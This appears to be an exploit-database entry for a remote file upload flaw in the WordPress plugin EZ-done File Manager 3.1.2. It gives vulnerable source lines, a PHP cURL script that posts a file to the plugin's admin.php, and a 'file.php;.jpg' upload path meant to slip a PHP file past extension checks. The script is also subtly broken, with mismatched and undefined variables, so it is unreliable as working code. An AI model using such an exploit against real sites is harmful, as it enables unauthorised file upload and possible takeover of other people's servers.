* Exploit Title: Wordpress EZ-done File Manager 3.1.2 - Remote File Upload * Google Dork: N/A * Date: 2020.10.28 * Exploit Author: Milad Karimi * Vendor Homepage: https://wordpress.org/plugins/ez-done-file-manager/ * Software Link: https://wordpress.org/plugins/ez-done-file-manager/ * Category : webapps * Version: 1.0 * Tested on: windows 10 , firefox * CVE : N/A Vulnerable Source:     379: move_uploaded_file move_uploaded_file($tmp_filepath, $target)) 375: $tmp_filepath = $_FILES['file']['tmp_name']; 378: $target = $AddDir . sanitize_file_name($_FILES['file']['name']); 352: $AddDir = $upload_dir['basedir'] . "/" . $MDP_target; 351: $upload_dir = wp_upload_dir(); 349: $MDP_target = filter_var($_REQUEST['ftarget'], FILTER_SANITIZE_STRING); 367: $_FILES['file']['name'] = str_replace(' ', '_', sanitize_file_name($_FILES['file']['name'])); Exploit: <?php $ch="file.jpg"; $ch1 = curl_init("http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/admin.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('zip'=>"@$sh")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); print "$result"; ?> Location File: http://localhost/wordpress/wp-content/plugins/ez-done-file-manager/file.php;.jpg